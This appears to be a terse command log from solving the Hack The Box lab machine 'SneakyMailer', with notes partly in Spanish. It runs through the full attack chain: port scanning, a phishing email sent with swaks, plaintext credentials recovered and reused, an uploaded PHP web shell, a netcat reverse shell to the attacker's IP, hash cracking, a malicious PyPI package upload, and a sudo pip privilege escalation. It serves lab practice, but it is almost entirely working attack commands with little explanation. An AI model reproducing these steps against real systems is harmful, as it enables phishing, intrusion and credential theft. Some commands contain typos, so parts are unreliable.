nmap -A -p- -oA output 10.129.2.28 --min-rate=10000 --script=vuln --script-timeout=15 -v
nmap -sC -sV -O -p- -oA sneakymailer 10.129.2.28
nmap -sU -O -p- -oA sneakymailer-udp 10.129.2.28
nikto -h 10.129.2.28:80
echo "10.129.2.28 sneakycorp.htb dev.sneakycorp.htb pypi.sneakycorp.htb" | sudo tee -a /etc/hosts
curl -s -X GET "http://sneakycorp.htb/team.php" | html2text | grep "sneakymailer.htb" |awk 'NF{print $NF}' >users
cat users | tr '\n' ','
swaks --from "cu3rv0x@sneakycorp.htb" --to "tigernixon@sneakymailer.htb....." --header "Subject: README" --body "Da click http://10.10.14.120/test" --server 10.129.2.28
sudo python3 -m htt.server 80
Vemos informacion de paul
php --interactive
echo ulrdecode("1
firstName=Paul&lastName=Byrd&email=paulbyrd%40sneakymailer.htb&password=%5E%28%23J%40SkFv2%5B%25KhIxKk%28Ju%60hqcHl%3C%3AHt&rpassword=%5E%28%23J%40SkFv2%5B%25KhIxKk%28Ju%60hqcHl%3C%3AHt")
Credenciales-> paulbyrd:^(#J@SkFv2[%KhIxKk(Ju'hqcHl<:Ht
a1 OK LOGIN
a2 OK LIST completed
a3 EXAMINE "INBOX"
a4 EXAMINE "INBOX.Trash"
a5 EXAMINE "INBOX.Sent"
a6 EXMAMINE "INBOX.Deleted Items"
a7 EXAMINE "INBOX.Sent Items"
a10 OK FETCH
a11 FETCH 2 body[]
cat credentials.txt
wfuzz -c --hh=185 -t 200 /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -H "Host: FUZZ.sneakycorp.htb" http://sneakycorp.htb
http://dev.sneakycorp.htb
ftp 10.129.2.28
paulbyrd:^(#J@SkFv2[%KhIxKk(Ju'hqcHl<:Ht
pust cu3rv0x.php
http://dev.sneaky.corp.htb/cu3rvox.php?cmd=whoami
http://dev.sneaky.corp.htb/cu3rvox.php?cmd=nc -e /bin/bash 10.10.14.120 443
nc -lvnp 443
uname -a
lsb_release -a
find \-perm -4000 2>/dev/null
ls -al
cat .htpasswd
john --wordlist=/usr/share/worldlists/rockyou.txt hash
soufianeelhaoui
cat /etc/ngnix/sites-available/pypi
ps -faux |grep "pypi"
http://pypi.sneakycorp.htb:8080
mkdir reverse
cd reverse
touch reverse/__init__.py
mkdir reverse
touch reverse/__init__.py
tree
cat setup.py
cat ~/.pypirc
python setup.py sdist upload -r reverse
sudo nc -lvnp 443
sudo -l
https://gtfobins.github.io/gtfobins/pip/
TF=$(mktemp -d)
echo "import os; os.execl('/bin/sh', 'sh', '-c', 'sh <$(tty) >$(tty) 2>$(tty)')" > $TF/setup.py
sudo pip install $TF